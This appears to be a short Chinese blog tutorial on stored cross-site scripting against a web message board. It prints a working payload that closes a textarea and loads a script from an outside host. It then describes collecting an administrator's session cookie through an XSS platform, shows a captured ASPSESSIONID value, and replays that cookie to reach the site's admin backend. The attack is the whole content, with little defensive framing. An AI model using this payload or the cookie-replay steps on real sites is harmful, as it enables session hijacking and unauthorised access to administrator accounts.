xss跨站脚本攻击
首先登录xssaq
之后创建新项目
创建成功后,提取
</tEXtArEa>'"><sCRiPt sRC=//uj.ci/i1w></sCrIpT>
之后打开网址“客户留言板块”
注意两个放入代码的位置
提交信息
之后我们模拟管理员查看留言
返回,查看xssaq平台
得到cookie
ASPSESSIONIDAADCCQSB=GFKPIJNCDOFGBIBPGFFCJINO
之后打开鬼哥浏览器,如图操作
成功进入后台
本文由 root 创作,采用 知识共享署名4.0 国际许可协议进行许可。
本站文章除注明转载/出处外,均为本站原创或翻译,转载前请务必署名。
alert('XSS')